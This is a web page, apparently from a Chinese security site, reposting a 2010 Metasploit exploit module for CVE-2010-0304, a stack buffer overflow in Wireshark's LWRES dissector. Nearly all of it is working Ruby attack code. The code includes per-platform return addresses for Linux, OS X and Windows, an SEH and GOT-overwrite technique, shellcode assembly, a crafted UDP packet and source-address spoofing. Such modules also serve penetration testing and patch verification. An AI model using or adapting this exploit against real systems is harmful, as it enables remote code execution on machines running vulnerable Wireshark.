首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:jduck 发布时间:2010-02-08   
##
# $Id: wireshark_lwres_getaddrbyname.rb 8367 2010-02-04 04:56:18Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'racket'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh
	include Msf::Exploit::Capture

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow',
			'Description' => %q{
					The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
				1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
				overflow. This bug found and reported by babi.

				This particular exploit targets the dissect_getaddrsbyname_request function. Several
				other functions also contain potentially exploitable stack-based buffer overflows.

				The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
				exploitation via the return address on the stack. Sending a larger string allows
				exploitation using the SEH bypass method. However, this packet will usually get
				fragmented, which may cause additional complications.

				NOTE: The vulnerable code is reached only when the packet dissection is rendered.
				If the packet is fragmented, all fragments must be captured and reassembled to
				exploit this issue.
			},
			'Author'      =>
				[
					'babi',   # original discovery/exploit
					'jduck',  # ported from public exploit
					'redsand' # windows target/testing
				],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 8367
, 'References' => [ [ 'CVE', '2010-0304' ], [ 'OSVDB', '61987' ], [ 'BID', '37985' ], [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ], [ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => true, # at least capture privilege 'Payload' => { 'Space' => 512, 'BadChars' => "\x00", 'DisableNops' => true, }, 'Targets' => [ [ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)', # breakpoint: lwres.so + 0x2ce2 { 'Arch' => ARCH_X86, 'Platform' => 'linux', # conveniently, edx pointed at our string.. # and so, we write it to g_slist_append's GOT entry just before its called. # pwnt. # # mov [ebx+0xc],edx / jmp 0x804fc40 --> # mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append # 'Ret' => 0x804fc85, # see above.. 'RetOff' => 376, 'Readable' => 0x804fa04, # just anything 'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append } ], [ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'linux', # the method for tshark doesn't work, since there aren't any convenient # pointers lying around (in reg/close on stack) # # since the wireshark bin has a jmp esp, we'll just use that method.. 'Ret' => 0x818fce8, # jmp esp in wireshark bin 'RetOff' => 376, 'Readable' => 0x8066a40, # just any old readable addr (unused) 'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused) } ], [ 'wireshark 1.2.5 on RHEL 5.4 (x64)', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux', 'Ret' => 0xfeedfed5deadbeef, 'RetOff' => 152, } ], [ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'osx', 'Ret' => 0xdeadbeef, 'RetOff' => 268, } ], # The following target was tested against Windows XP SP3 and Windows Vista [ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win', # NOTE: due to the length of this packet, your mileage may vary. 'Ret' => 0x61B4121B, # 0x655810b6 = pop/pop/ret in libpango # 0x02A110B6 = pop/pop/ret in libgtk-w # 0x03D710CC = pop/mov/pop/ret in packet # 0x61B4121B = pop/pop/ret in pcre3 'RetOff' => 2128, } ], ], 'DisclosureDate' => 'Jan 27 2010')) register_options([ Opt::RPORT(921), OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]) ], self.class) deregister_options('FILTER','PCAPFILE') end def exploit ret_offset = target['RetOff'] # we have different techniques depending on the target if (target == targets[0]) # debian tshark str = make_nops(ret_offset - payload.encoded.length - 16) str << payload.encoded str << [target['GotAddr'] - 0xc].pack('V') str << rand_text(4) str << [target['Readable']].pack('V') str << rand_text(4) # ret is next elsif (target == targets[1]) fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string str = make_nops(ret_offset - fix_esp.length - payload.encoded.length) str << fix_esp str << payload.encoded # jmp esp... str << [target.ret].pack('V') # jump back distance = ret_offset + 4 str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string elsif (target == targets[4]) # ugh, /GS and UDP length issues :-/ str = make_nops(ret_offset - payload.encoded.length) str << payload.encoded str << generate_seh_record(target.ret) # jump back distance = ret_offset + 8 str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string else # this is just a simple DoS payload str = Rex::Text.pattern_create(ret_offset) #str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp ___FCKpd___06").encode_string end # add return address #XXX: this isn't working? #str << Rex::Arch.pack_addr(target.arch, target.ret) str << [target.ret].pack('V') # form the packet's payload! sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01" sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00" sploit << "\x00\x00\x00\x01" sploit << [str.length].pack('n') sploit << str sploit << "\x00\x00" shost = datastore['SHOST'] if (shost) print_status("Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})") open_pcap n = Racket::Racket.new n.l3 = Racket::L3::IPv4.new n.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost) n.l3.dst_ip = rhost n.l3.protocol = 6 n.l3.id = rand(0x10000) n.l3.ttl = 64 n.l4 = Racket::L4::UDP.new n.l4.src_port = rand((2**16)-1024)+1024 n.l4.dst_port = datastore['RPORT'].to_i n.l4.payload = sploit n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) pkt = n.pack capture_sendto(pkt, rhost) close_pcap handler else print_status("Sending malformed LWRES packet to #{rhost}") connect_udp udp_sock.put(sploit) handler disconnect_udp end end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Audiotran 1.4.1 (PLS File) Sta
·Signed Applet Social Engineeri
·AstonSoft DeepBurner (DBR File
·Ipswitch IMAIL 11.01 reversibl
·Novell iPrint Client ActiveX C
·Opera 10.10 Remote Code Execut
·Novell iPrint Client ActiveX C
·FoxPlayer 1.7.0 (.m3u) Local B
·MySQL yaSSL CertDecoder::GetNa
·X-lite SIP v3 (wav) memory cor
·httpdx v1.5.2 Remote Pre-Authe
·UplusFtp Server v1.7.0.12 Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved